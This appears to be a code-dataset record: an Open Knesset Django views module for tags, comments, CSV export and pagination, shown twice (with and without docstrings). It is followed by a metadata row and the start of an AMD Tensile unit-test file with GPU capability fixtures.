form = TidbitSuggestionForm(request.POST)
if form.is_valid():
form.save(request)
return form.get_response()
NUMOF_EVENTS = 8
events = Event.objects.get_upcoming()
context = {
'title': _('Home'),
'hide_crumbs': True,
'is_index': True,
'tidbits': Tidbit.active.all().order_by('?'),
'suggestion_forms': {'tidbit': TidbitSuggestionForm()},
'events': events[:NUMOF_EVENTS],
'INITIAL_EVENTS': NUMOF_EVENTS,
'events_more': events.count() > NUMOF_EVENTS,
}
template_name = '%s.%s%s' % ('main', settings.LANGUAGE_CODE, '.html')
return render_to_response(template_name, context,
context_instance=RequestContext(request))
@require_http_methods(['POST'])
def post_feedback(request):
"Post a feedback suggestion form"
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = FeedbackSuggestionForm(request.POST)
if form.is_valid():
form.save(request)
return form.get_response()
@require_http_methods(['POST'])
def suggest_tag_post(request):
"Post a tag suggestion form"
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = TagSuggestionForm(request.POST)
if form.is_valid():
content_type = ContentType.objects.get_by_natural_key(form.cleaned_data['app_label'], form.cleaned_data['object_type'])
object = content_type.get_object_for_this_type(pk=form.cleaned_data['object_id'])
ts = TagSuggestion(
name=form.cleaned_data['name'],
suggested_by=request.user,
object=object
)
ts.save()
return form.get_response()
def post_annotation(request):
if request.user.has_perm('annotatetext.add_annotation'):
return annotatetext_post_annotation(request)
else:
return HttpResponseForbidden(_("Sorry, you do not have the permission to annotate."))
def search(request, lang='he'):
# remove the 'cof' get variable from the query string so that the page
# linked to by the javascript fallback doesn't think its inside an iframe.
mutable_get = request.GET.copy()
if 'cof' in mutable_get:
del mutable_get['cof']
return render_to_response('search/search.html', RequestContext(request, {
'query': request.GET.get('q'),
'query_string': mutable_get.urlencode(),
'has_search': True,
'lang': lang,
'cx': settings.GOOGLE_CUSTOM_SEARCH,
}))
def post_details(request, post_id):
''' patching django-planet's post_detail view so it would update the
hitcount and redirect to the post's url
'''
from hitcount.views import _update_hit_count
from hitcount.models import HitCount
from planet.models import Post
# update the it count
ctype = ContentType.objects.get(app_label="planet", model="post")
hitcount, created = HitCount.objects.get_or_create(content_type=ctype,
object_pk=post_id)
result = _update_hit_count(request, hitcount)
post = get_object_or_404(Post, pk=post_id)
return HttpResponseRedirect(post.url)
class RobotsView(TemplateView):
"""Return the robots.txt"""
template_name = 'robots.txt'
def render_to_response(self, context, **kwargs):
return super(RobotsView, self).render_to_response(context,
content_type='text/plain', **kwargs)
class AboutView(TemplateView):
"""About template"""
template_name = 'about.html'
class CommentsView(ListView):
"""Comments index view"""
model = Comment
queryset = Comment.objects.order_by("-submit_date")
paginate_by = 20
def _add_tag_to_object(user, app, object_type, object_id, tag):
ctype = ContentType.objects.get_by_natural_key(app, object_type)
(ti, created) = TaggedItem._default_manager.get_or_create(
tag=tag,
content_type=ctype,
object_id=object_id)
action.send(user, verb='tagged', target=ti, description='%s' % (tag.name))
url = reverse('tag-detail', kwargs={'slug': tag.name})
return HttpResponse("{'id':%d, 'name':'%s', 'url':'%s'}" % (tag.id,
tag.name,
url))
@login_required
def add_tag_to_object(request, app, object_type, object_id):
"""add a POSTed tag_id to object_type object_id by the current user"""
if request.method == 'POST' and 'tag_id' in request.POST: # If the form has been submitted...
tag = get_object_or_404(Tag,pk=request.POST['tag_id'])
return _add_tag_to_object(request.user, app, object_type, object_id, tag)
return HttpResponseNotAllowed(['POST'])
@login_required
def remove_tag_from_object(request, app, object_type, object_id):
"""remove a POSTed tag_id from object_type object_id"""
ctype = ContentType.objects.get_by_natural_key(app, object_type)
if request.method == 'POST' and 'tag_id' in request.POST: # If the form has been submitted...
tag = get_object_or_404(Tag,pk=request.POST['tag_id'])
ti = TaggedItem._default_manager.filter(tag=tag, content_type=ctype, object_id=object_id)
if len(ti)==1:
logger.debug('user %s is deleting tagged item %d' % (request.user.username, ti[0].id))
ti[0].delete()
action.send(request.user,verb='removed-tag', target=ti[0], description='%s' % (tag.name))
else:
logger.debug('user %s tried removing tag %d from object, but failed, because len(tagged_items)!=1' % (request.user.username, tag.id))
return HttpResponse("{'id':%d,'name':'%s'}" % (tag.id,tag.name))
@permission_required('tagging.add_tag')
def create_tag_and_add_to_item(request, app, object_type, object_id):
"""adds tag with name=request.POST['tag'] to the tag list, and tags the given object with it
****
Currently not used anywhere, sine we don't want to allow users to add
more tags for now.
"""
if request.method == 'POST' and 'tag' in request.POST:
tag = request.POST['tag'].strip()
msg = "user %s is creating tag %s on object_type %s and object_id %s".encode('utf8') % (request.user.username, tag, object_type, object_id)
logger.info(msg)
notify_responsible_adult(msg)
if len(tag)<3:
return HttpResponseBadRequest()
tags = Tag.objects.filter(name=tag)
if not tags:
try:
tag = Tag.objects.create(name=tag)
except Exception:
logger.warn("can't create tag %s" % tag)
return HttpResponseBadRequest()
if len(tags)==1:
tag = tags[0]
if len(tags)>1:
logger.warn("More than 1 tag: %s" % tag)
return HttpResponseBadRequest()
return _add_tag_to_object(request.user, app, object_type, object_id, tag)
else:
return HttpResponseNotAllowed(['POST'])
def calculate_cloud_from_models(*args):
from tagging.models import Tag
cloud = Tag._default_manager.cloud_for_model(args[0])
for model in args[1:]:
for tag in Tag._default_manager.cloud_for_model(model):
if tag in cloud:
cloud[cloud.index(tag)].count+=tag.count
else:
cloud.append(tag)
return tagging.utils.calculate_cloud(cloud)
class TagList(ListView):
"""Tags index view"""
model = Tag
template_name = 'auxiliary/tag_list.html'
def get_queryset(self):
return Tag.objects.all()
def get_context_data(self, **kwargs):
context = super(TagList, self).get_context_data(**kwargs)
tags_cloud = cache.get('tags_cloud', None)
if not tags_cloud:
tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
tags_cloud.sort(key=lambda x:x.name)
cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
context['tags_cloud'] = tags_cloud
return context
class TagDetail(DetailView):
"""Tags index view"""
model = Tag
template_name = 'auxiliary/tag_detail.html'
slug_field = 'name'
def create_tag_cloud(self, tag, limit=30, bills=None, votes=None,
cms=None):
"""
Create tag could for tag <tag>. Returns only the <limit> most tagged members
"""
try:
mk_limit = int(self.request.GET.get('limit', limit))
except ValueError:
mk_limit = limit
if bills is None:
bills = TaggedItem.objects.get_by_model(Bill, tag)\
.prefetch_related('proposers')
if votes is None:
votes = TaggedItem.objects.get_by_model(Vote, tag)\
.prefetch_related('votes')
if cms is None:
cms = TaggedItem.objects.get_by_model(CommitteeMeeting, tag)\
.prefetch_related('mks_attended')
mk_taggeds = [(b.proposers.all(), b.stage_date) for b in bills]
mk_taggeds += [(v.votes.all(), v.time.date()) for v in votes]
mk_taggeds += [(cm.mks_attended.all(), cm.date) for cm in cms]
current_k_start = Knesset.objects.current_knesset().start_date
d = {}
d_previous = {}
for tagged, date in mk_taggeds:
if date and (date > current_k_start):
for p in tagged:
d[p] = d.get(p, 0) + 1
else: # not current knesset
for p in tagged:
d_previous[p] = d.get(p, 0) + 1
# now d is a dict: MK -> number of tagged in Bill, Vote and
# CommitteeMeeting in this tag, in the current knesset
# d_previous is similar, but for all non current knesset data
mks = dict(sorted(d.items(), lambda x, y: cmp(y[1], x[1]))[:mk_limit])
# Now only the most tagged are in the dict (up to the limit param)
for mk in mks:
mk.count = d[mk]
mks = tagging.utils.calculate_cloud(mks)
mks_previous = dict(sorted(d_previous.items(),
lambda x, y: cmp(y[1], x[1]))[:mk_limit])
for mk in mks_previous:
mk.count = d_previous[mk]
mks_previous = tagging.utils.calculate_cloud(mks_previous)
return mks, mks_previous
def get(self, *args, **kwargs):
tag = self.get_object()
ts = TagSynonym.objects.filter(synonym_tag=tag)
if len(ts) > 0:
proper = ts[0].tag
url = reverse('tag-detail', kwargs={'slug': proper.name})
return HttpResponsePermanentRedirect(url)
else:
return super(TagDetail, self).get(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(TagDetail, self).get_context_data(**kwargs)
tag = context['object']
bills_ct = ContentType.objects.get_for_model(Bill)
bill_ids = TaggedItem.objects.filter(
tag=tag,
content_type=bills_ct).values_list('object_id', flat=True)
bills = Bill.objects.filter(id__in=bill_ids)
context['bills'] = bills
votes_ct = ContentType.objects.get_for_model(Vote)
vote_ids = TaggedItem.objects.filter(
tag=tag, content_type=votes_ct).values_list('object_id', flat=True)
votes = Vote.objects.filter(id__in=vote_ids)
context['votes'] = votes
cm_ct = ContentType.objects.get_for_model(CommitteeMeeting)
cm_ids = TaggedItem.objects.filter(
tag=tag, content_type=cm_ct).values_list('object_id', flat=True)
cms = CommitteeMeeting.objects.filter(id__in=cm_ids)
context['cms'] = cms
(context['members'],
context['past_members']) = self.create_tag_cloud(tag)
return context
class CsvView(BaseListView):
"""A view which generates CSV files with information for a model queryset.
Important class members to set when inheriting:
* model -- the model to display information from.
* queryset -- the query performed on the model; defaults to all.
* filename -- the name of the resulting CSV file (e.g., "info.csv").
* list_display - a list (or tuple) of tuples, where the first item in
each tuple is the attribute (or the method) to display and
the second item is the title of that column.
The attribute can be a attribute on the CsvView child or the model
instance itself. If it's a callable it'll be called with (obj, attr)
for the CsvView attribute or without params for the model attribute.
"""
filename = None
list_display = None
def dispatch(self, request):
if None in (self.filename, self.list_display, self.model):
raise Http404()
self.request = request
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = \
'attachment; filename="{}"'.format(self.filename)
object_list = self.get_queryset()
self.prepare_csv_for_utf8(response)
writer = csv.writer(response, dialect='excel')
writer.writerow([title.encode('utf8')
for _, title in self.list_display])
for obj in object_list:
row = [self.get_display_attr(obj, attr)
for attr, _ in self.list_display]
writer.writerow([unicode(item).encode('utf8') for item in row])
return response
def get_display_attr(self, obj, attr):
"""Return the display string for an attr, calling it if necessary."""
display_attr = getattr(self, attr, None)
if display_attr is not None:
if callable(display_attr):
display_attr = display_attr(obj,attr)
else:
display_attr = getattr(obj, attr)
if callable(display_attr):
display_attr = display_attr()
if display_attr is None:
return ""
return display_attr
@staticmethod
def prepare_csv_for_utf8(fileobj):
"""Prepend a byte order mark (BOM) to a file.
When Excel opens a CSV file, it assumes the encoding is ASCII. The BOM
directs it to decode the file with utf-8.
"""
fileobj.write('\xef\xbb\xbf')
class GetMoreView(ListView):
"""A base view for feeding data to 'get more...' type of links
Will return a json result, with partial of rendered template:
{
"content": "....",
"current": current_patge number
"total": total_pages
"has_next": true if next page exists
}
We'll paginate the response. Since Get More link targets may already have
initial data, we'll look for `initial` GET param, and take it into
consdiration, completing to page size.
"""
def get_context_data(self, **kwargs):
ctx = super(GetMoreView, self).get_context_data(**kwargs)
try:
initial = int(self.request.GET.get('initial', '0'))
except ValueError:
initial = 0
# initial only affects on first page
if ctx['page_obj'].number > 1 or initial >= self.paginate_by - 1:
initial = 0
ctx['object_list'] = ctx['object_list'][initial:]
return ctx
def render_to_response(self, context, **response_kwargs):
"""We'll take the rendered content, and shove it into json"""
tmpl_response = super(GetMoreView, self).render_to_response(
context, **response_kwargs).render()
page = context['page_obj']
result = {
'content': tmpl_response.content,
'total': context['paginator'].num_pages,
'current': page.number,
'has_next': page.has_next(),
}
return HttpResponse(json.dumps(result, ensure_ascii=False),
content_type='application/json')
def untagged_objects(request):
return render_to_response('auxiliary/untagged_objects.html', {
'cms': CommitteeMeeting.objects.filter_and_order(tagged=['false'])[:100],
'cms_count': CommitteeMeeting.objects.filter_and_order(tagged=['false']).count(),
'bills': Bill.objects.filter_and_order(tagged='false')[:100],
'bill_count': Bill.objects.filter_and_order(tagged='false').count(),
'votes': Vote.objects.filter_and_order(tagged='false')[:100],
'vote_count': Vote.objects.filter_and_order(tagged='false').count(),
},
context_instance=RequestContext(request))
| 39.294408 | 147 | 0.633544 | import csv, random, tagging, logging
from actstream import action
from annotatetext.views import post_annotation as annotatetext_post_annotation
from django.conf import settings
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.http import (
HttpResponseForbidden, HttpResponseRedirect, HttpResponse,
HttpResponseNotAllowed, HttpResponseBadRequest, Http404, HttpResponsePermanentRedirect)
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.utils import simplejson as json
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView, DetailView, ListView
from django.views.generic.list import BaseListView
from django.views.decorators.http import require_http_methods
from tagging.models import Tag, TaggedItem
from .forms import TidbitSuggestionForm, FeedbackSuggestionForm, TagSuggestionForm
from .models import Tidbit, TagSuggestion
from committees.models import CommitteeMeeting
from events.models import Event
from knesset.utils import notify_responsible_adult
from laws.models import Vote, Bill
from mks.models import Member, Knesset
from tagging.utils import get_tag
from auxiliary.models import TagSynonym
class BaseTagMemberListView(ListView):
url_to_reverse = None
@property
def tag_instance(self):
if not hasattr(self, '_tag_instance'):
tag = self.kwargs['tag']
self._tag_instance = get_tag(tag)
if self._tag_instance is None:
raise Http404(_('No Tag found matching "%s".') % tag)
return self._tag_instance
@property
def member(self):
if not hasattr(self, '_member'):
member_id = self.request.GET.get('member', False)
if member_id:
try:
member_id = int(member_id)
except ValueError:
raise Http404(
_('No Member found matching "%s".') % member_id)
self._member = get_object_or_404(Member, pk=member_id)
else:
self._member = None
return self._member
def get_context_data(self, *args, **kwargs):
context = super(BaseTagMemberListView, self).get_context_data(
*args, **kwargs)
context['tag'] = self.tag_instance
context['tag_url'] = reverse(self.url_to_reverse,
args=[self.tag_instance])
if self.member:
context['member'] = self.member
context['member_url'] = reverse(
'member-detail', args=[self.member.pk])
user = self.request.user
if user.is_authenticated():
context['watched_members'] = user.get_profile().members
else:
context['watched_members'] = False
return context
logger = logging.getLogger("open-knesset.auxiliary.views")
def help_page(request):
context = cache.get('help_page_context')
if not context:
context = {}
context['title'] = _('Help')
context['member'] = Member.current_knesset.all()[random.randrange(Member.current_knesset.count())]
votes = Vote.objects.filter_and_order(order='controversy')
context['vote'] = votes[random.randrange(votes.count())]
context['bill'] = Bill.objects.all()[random.randrange(Bill.objects.count())]
tags_cloud = cache.get('tags_cloud', None)
if not tags_cloud:
tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
tags_cloud.sort(key=lambda x:x.name)
cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
context['tags'] = random.sample(tags_cloud,
min(len(tags_cloud),8)
) if tags_cloud else None
context['has_search'] = False
cache.set('help_page_context', context, 300)
template_name = '%s.%s%s' % ('help_page', settings.LANGUAGE_CODE, '.html')
return render_to_response(template_name, context, context_instance=RequestContext(request))
def add_previous_comments(comments):
previous_comments = set()
for c in comments:
c.previous_comments = Comment.objects.filter(
object_pk=c.object_pk,
content_type=c.content_type,
submit_date__lt=c.submit_date).select_related('user')
previous_comments.update(c.previous_comments)
c.is_comment = True
comments = [c for c in comments if c not in previous_comments]
return comments
def get_annotations(comments, annotations):
for a in annotations:
a.submit_date = a.timestamp
comments = add_previous_comments(comments)
annotations.extend(comments)
annotations.sort(key=lambda x:x.submit_date,reverse=True)
return annotations
def main(request):
if request.method == 'POST':
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = TidbitSuggestionForm(request.POST)
if form.is_valid():
form.save(request)
return form.get_response()
NUMOF_EVENTS = 8
events = Event.objects.get_upcoming()
context = {
'title': _('Home'),
'hide_crumbs': True,
'is_index': True,
'tidbits': Tidbit.active.all().order_by('?'),
'suggestion_forms': {'tidbit': TidbitSuggestionForm()},
'events': events[:NUMOF_EVENTS],
'INITIAL_EVENTS': NUMOF_EVENTS,
'events_more': events.count() > NUMOF_EVENTS,
}
template_name = '%s.%s%s' % ('main', settings.LANGUAGE_CODE, '.html')
return render_to_response(template_name, context,
context_instance=RequestContext(request))
@require_http_methods(['POST'])
def post_feedback(request):
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = FeedbackSuggestionForm(request.POST)
if form.is_valid():
form.save(request)
return form.get_response()
@require_http_methods(['POST'])
def suggest_tag_post(request):
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = TagSuggestionForm(request.POST)
if form.is_valid():
content_type = ContentType.objects.get_by_natural_key(form.cleaned_data['app_label'], form.cleaned_data['object_type'])
object = content_type.get_object_for_this_type(pk=form.cleaned_data['object_id'])
ts = TagSuggestion(
name=form.cleaned_data['name'],
suggested_by=request.user,
object=object
)
ts.save()
return form.get_response()
def post_annotation(request):
if request.user.has_perm('annotatetext.add_annotation'):
return annotatetext_post_annotation(request)
else:
return HttpResponseForbidden(_("Sorry, you do not have the permission to annotate."))
def search(request, lang='he'):
mutable_get = request.GET.copy()
if 'cof' in mutable_get:
del mutable_get['cof']
return render_to_response('search/search.html', RequestContext(request, {
'query': request.GET.get('q'),
'query_string': mutable_get.urlencode(),
'has_search': True,
'lang': lang,
'cx': settings.GOOGLE_CUSTOM_SEARCH,
}))
def post_details(request, post_id):
from hitcount.views import _update_hit_count
from hitcount.models import HitCount
from planet.models import Post
# update the it count
ctype = ContentType.objects.get(app_label="planet", model="post")
hitcount, created = HitCount.objects.get_or_create(content_type=ctype,
object_pk=post_id)
result = _update_hit_count(request, hitcount)
post = get_object_or_404(Post, pk=post_id)
return HttpResponseRedirect(post.url)
class RobotsView(TemplateView):
template_name = 'robots.txt'
def render_to_response(self, context, **kwargs):
return super(RobotsView, self).render_to_response(context,
content_type='text/plain', **kwargs)
class AboutView(TemplateView):
template_name = 'about.html'
class CommentsView(ListView):
model = Comment
queryset = Comment.objects.order_by("-submit_date")
paginate_by = 20
def _add_tag_to_object(user, app, object_type, object_id, tag):
ctype = ContentType.objects.get_by_natural_key(app, object_type)
(ti, created) = TaggedItem._default_manager.get_or_create(
tag=tag,
content_type=ctype,
object_id=object_id)
action.send(user, verb='tagged', target=ti, description='%s' % (tag.name))
url = reverse('tag-detail', kwargs={'slug': tag.name})
return HttpResponse("{'id':%d, 'name':'%s', 'url':'%s'}" % (tag.id,
tag.name,
url))
@login_required
def add_tag_to_object(request, app, object_type, object_id):
if request.method == 'POST' and 'tag_id' in request.POST: # If the form has been submitted...
tag = get_object_or_404(Tag,pk=request.POST['tag_id'])
return _add_tag_to_object(request.user, app, object_type, object_id, tag)
return HttpResponseNotAllowed(['POST'])
@login_required
def remove_tag_from_object(request, app, object_type, object_id):
ctype = ContentType.objects.get_by_natural_key(app, object_type)
if request.method == 'POST' and 'tag_id' in request.POST: # If the form has been submitted...
tag = get_object_or_404(Tag,pk=request.POST['tag_id'])
ti = TaggedItem._default_manager.filter(tag=tag, content_type=ctype, object_id=object_id)
if len(ti)==1:
logger.debug('user %s is deleting tagged item %d' % (request.user.username, ti[0].id))
ti[0].delete()
action.send(request.user,verb='removed-tag', target=ti[0], description='%s' % (tag.name))
else:
logger.debug('user %s tried removing tag %d from object, but failed, because len(tagged_items)!=1' % (request.user.username, tag.id))
return HttpResponse("{'id':%d,'name':'%s'}" % (tag.id,tag.name))
@permission_required('tagging.add_tag')
def create_tag_and_add_to_item(request, app, object_type, object_id):
if request.method == 'POST' and 'tag' in request.POST:
tag = request.POST['tag'].strip()
msg = "user %s is creating tag %s on object_type %s and object_id %s".encode('utf8') % (request.user.username, tag, object_type, object_id)
logger.info(msg)
notify_responsible_adult(msg)
if len(tag)<3:
return HttpResponseBadRequest()
tags = Tag.objects.filter(name=tag)
if not tags:
try:
tag = Tag.objects.create(name=tag)
except Exception:
logger.warn("can't create tag %s" % tag)
return HttpResponseBadRequest()
if len(tags)==1:
tag = tags[0]
if len(tags)>1:
logger.warn("More than 1 tag: %s" % tag)
return HttpResponseBadRequest()
return _add_tag_to_object(request.user, app, object_type, object_id, tag)
else:
return HttpResponseNotAllowed(['POST'])
def calculate_cloud_from_models(*args):
from tagging.models import Tag
cloud = Tag._default_manager.cloud_for_model(args[0])
for model in args[1:]:
for tag in Tag._default_manager.cloud_for_model(model):
if tag in cloud:
cloud[cloud.index(tag)].count+=tag.count
else:
cloud.append(tag)
return tagging.utils.calculate_cloud(cloud)
class TagList(ListView):
model = Tag
template_name = 'auxiliary/tag_list.html'
def get_queryset(self):
return Tag.objects.all()
def get_context_data(self, **kwargs):
context = super(TagList, self).get_context_data(**kwargs)
tags_cloud = cache.get('tags_cloud', None)
if not tags_cloud:
tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
tags_cloud.sort(key=lambda x:x.name)
cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
context['tags_cloud'] = tags_cloud
return context
class TagDetail(DetailView):
model = Tag
template_name = 'auxiliary/tag_detail.html'
slug_field = 'name'
def create_tag_cloud(self, tag, limit=30, bills=None, votes=None,
cms=None):
try:
mk_limit = int(self.request.GET.get('limit', limit))
except ValueError:
mk_limit = limit
if bills is None:
bills = TaggedItem.objects.get_by_model(Bill, tag)\
.prefetch_related('proposers')
if votes is None:
votes = TaggedItem.objects.get_by_model(Vote, tag)\
.prefetch_related('votes')
if cms is None:
cms = TaggedItem.objects.get_by_model(CommitteeMeeting, tag)\
.prefetch_related('mks_attended')
mk_taggeds = [(b.proposers.all(), b.stage_date) for b in bills]
mk_taggeds += [(v.votes.all(), v.time.date()) for v in votes]
mk_taggeds += [(cm.mks_attended.all(), cm.date) for cm in cms]
current_k_start = Knesset.objects.current_knesset().start_date
d = {}
d_previous = {}
for tagged, date in mk_taggeds:
if date and (date > current_k_start):
for p in tagged:
d[p] = d.get(p, 0) + 1
else:
for p in tagged:
d_previous[p] = d.get(p, 0) + 1
mks = dict(sorted(d.items(), lambda x, y: cmp(y[1], x[1]))[:mk_limit])
for mk in mks:
mk.count = d[mk]
mks = tagging.utils.calculate_cloud(mks)
mks_previous = dict(sorted(d_previous.items(),
lambda x, y: cmp(y[1], x[1]))[:mk_limit])
for mk in mks_previous:
mk.count = d_previous[mk]
mks_previous = tagging.utils.calculate_cloud(mks_previous)
return mks, mks_previous
def get(self, *args, **kwargs):
tag = self.get_object()
ts = TagSynonym.objects.filter(synonym_tag=tag)
if len(ts) > 0:
proper = ts[0].tag
url = reverse('tag-detail', kwargs={'slug': proper.name})
return HttpResponsePermanentRedirect(url)
else:
return super(TagDetail, self).get(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(TagDetail, self).get_context_data(**kwargs)
tag = context['object']
bills_ct = ContentType.objects.get_for_model(Bill)
bill_ids = TaggedItem.objects.filter(
tag=tag,
content_type=bills_ct).values_list('object_id', flat=True)
bills = Bill.objects.filter(id__in=bill_ids)
context['bills'] = bills
votes_ct = ContentType.objects.get_for_model(Vote)
vote_ids = TaggedItem.objects.filter(
tag=tag, content_type=votes_ct).values_list('object_id', flat=True)
votes = Vote.objects.filter(id__in=vote_ids)
context['votes'] = votes
cm_ct = ContentType.objects.get_for_model(CommitteeMeeting)
cm_ids = TaggedItem.objects.filter(
tag=tag, content_type=cm_ct).values_list('object_id', flat=True)
cms = CommitteeMeeting.objects.filter(id__in=cm_ids)
context['cms'] = cms
(context['members'],
context['past_members']) = self.create_tag_cloud(tag)
return context
class CsvView(BaseListView):
filename = None
list_display = None
def dispatch(self, request):
if None in (self.filename, self.list_display, self.model):
raise Http404()
self.request = request
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = \
'attachment; filename="{}"'.format(self.filename)
object_list = self.get_queryset()
self.prepare_csv_for_utf8(response)
writer = csv.writer(response, dialect='excel')
writer.writerow([title.encode('utf8')
for _, title in self.list_display])
for obj in object_list:
row = [self.get_display_attr(obj, attr)
for attr, _ in self.list_display]
writer.writerow([unicode(item).encode('utf8') for item in row])
return response
def get_display_attr(self, obj, attr):
display_attr = getattr(self, attr, None)
if display_attr is not None:
if callable(display_attr):
display_attr = display_attr(obj,attr)
else:
display_attr = getattr(obj, attr)
if callable(display_attr):
display_attr = display_attr()
if display_attr is None:
return ""
return display_attr
@staticmethod
def prepare_csv_for_utf8(fileobj):
fileobj.write('\xef\xbb\xbf')
class GetMoreView(ListView):
def get_context_data(self, **kwargs):
ctx = super(GetMoreView, self).get_context_data(**kwargs)
try:
initial = int(self.request.GET.get('initial', '0'))
except ValueError:
initial = 0
if ctx['page_obj'].number > 1 or initial >= self.paginate_by - 1:
initial = 0
ctx['object_list'] = ctx['object_list'][initial:]
return ctx
def render_to_response(self, context, **response_kwargs):
tmpl_response = super(GetMoreView, self).render_to_response(
context, **response_kwargs).render()
page = context['page_obj']
result = {
'content': tmpl_response.content,
'total': context['paginator'].num_pages,
'current': page.number,
'has_next': page.has_next(),
}
return HttpResponse(json.dumps(result, ensure_ascii=False),
content_type='application/json')
def untagged_objects(request):
return render_to_response('auxiliary/untagged_objects.html', {
'cms': CommitteeMeeting.objects.filter_and_order(tagged=['false'])[:100],
'cms_count': CommitteeMeeting.objects.filter_and_order(tagged=['false']).count(),
'bills': Bill.objects.filter_and_order(tagged='false')[:100],
'bill_count': Bill.objects.filter_and_order(tagged='false').count(),
'votes': Vote.objects.filter_and_order(tagged='false')[:100],
'vote_count': Vote.objects.filter_and_order(tagged='false').count(),
},
context_instance=RequestContext(request))
| true | true |
f7fa41252ca5286426a644c2a0f58379888142d3 | 7,037 | py | Python | Tensile/Tests/unit/test_Component.py | ufo2011/Tensile | f8fe37a2708f757a7e97171ca9e40c7581bd40dd | [
"MIT"
] | 116 | 2017-06-29T08:52:55.000Z | 2022-03-25T03:01:43.000Z | Tensile/Tests/unit/test_Component.py | ufo2011/Tensile | f8fe37a2708f757a7e97171ca9e40c7581bd40dd | [
"MIT"
] | 431 | 2017-07-19T16:29:54.000Z | 2022-03-31T19:40:12.000Z | Tensile/Tests/unit/test_Component.py | ufo2011/Tensile | f8fe37a2708f757a7e97171ca9e40c7581bd40dd | [
"MIT"
] | 107 | 2017-10-14T01:38:41.000Z | 2022-03-07T08:49:09.000Z | ################################################################################
# Copyright 2020 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
import pytest
import Tensile.Component as Component
import Tensile.Components as Components
from Tensile.DataType import DataType
def test_PartialMatch():
a = {'foo': True,
'bar': 25,
'baz': {'Enabled': True,
'Debug': False}}
b = {'foo': True}
assert Component.PartialMatch(b, a)
assert not Component.PartialMatch(a, b)
assert not Component.PartialMatch({'foo': False}, a)
assert not Component.PartialMatch({'baz': {"Enabled": False}}, a)
assert Component.PartialMatch({'baz': {"Enabled": True}}, a)
assert not Component.PartialMatch({'baz': {"Error": True}}, a)
assert not Component.PartialMatch({'bar': lambda x: x < 10}, a)
assert Component.PartialMatch({'bar': lambda x: x > 10}, a)
shouldMatch = lambda obj: obj['foo'] and obj['bar'] > 20
shouldNotMatch = lambda obj: obj['foo'] and obj['bar'] < 20
assert Component.PartialMatch(shouldMatch, a)
assert not Component.PartialMatch(shouldNotMatch, a)
class MockWriter:
def __init__(self, **kwargs):
defaultArgs = {'endLine': '\n'}
args = {}
args.update(defaultArgs)
args.update(kwargs)
for k,v in args.items():
setattr(self, k, v)
@pytest.fixture
def vega10():
return {
'asmCaps': {'v_fma_f16': False,
'v_pk_fma_f16': True,
'v_dot2c_f32_f16': False,
'v_dot2_f32_f16': False,
'v_dot4c_i32_i8': False,
'v_dot4_i32_i8': False,
"v_mad_mix_f32": True,
"v_fma_mix_f32": False,
"v_mac_f32": True,
"v_fma_f32": True,
"v_fmac_f32": False,
}
}
@pytest.fixture
def navi10():
return {
'asmCaps': {'v_fma_f16': True,
'v_pk_fma_f16': False,
'v_dot2c_f32_f16': False,
'v_dot2_f32_f16': False,
'v_dot4c_i32_i8': False,
'v_dot4_i32_i8': False,
"v_mad_mix_f32": False,
"v_fma_mix_f32": True,
"v_mac_f32": True,
"v_fma_f32": True,
"v_fmac_f32": True}
}
@pytest.fixture
def navi12():
return {
'asmCaps': {'v_fma_f16': False,
'v_pk_fma_f16': False,
'v_dot2c_f32_f16': True,
'v_dot2_f32_f16': True,
'v_dot4c_i32_i8': True,
'v_dot4_i32_i8': True,
"v_mad_mix_f32": False,
"v_fma_mix_f32": True,
"v_mac_f32": True,
"v_fma_f32": True,
"v_fmac_f32": True}
}
@pytest.fixture
def f16():
return {
'kernel': {"ProblemType": {"DataType": DataType(DataType.half),
"HighPrecisionAccumulate": False},
"AggressivePerfMode": True,
"LocalDotLayout": 1,
"InnerUnroll": 1,
"ThreadTile0": 4,
"ThreadTile1": 4}
}
@pytest.fixture
def f16_hpa():
return {
'kernel': {"ProblemType": {"DataType": DataType(DataType.half),
"HighPrecisionAccumulate": True},
"AggressivePerfMode": True,
"LocalDotLayout": 1,
"InnerUnroll": 1,
"ThreadTile0": 4,
"ThreadTile1": 4}
}
@pytest.fixture
def f16_hpa_ldl():
return {
'kernel': {"ProblemType": {"DataType": DataType(DataType.half),
"HighPrecisionAccumulate": True},
"AggressivePerfMode": True,
"LocalDotLayout": 2,
"InnerUnroll": 2,
"ThreadTile0": 4,
"ThreadTile1": 4}
}
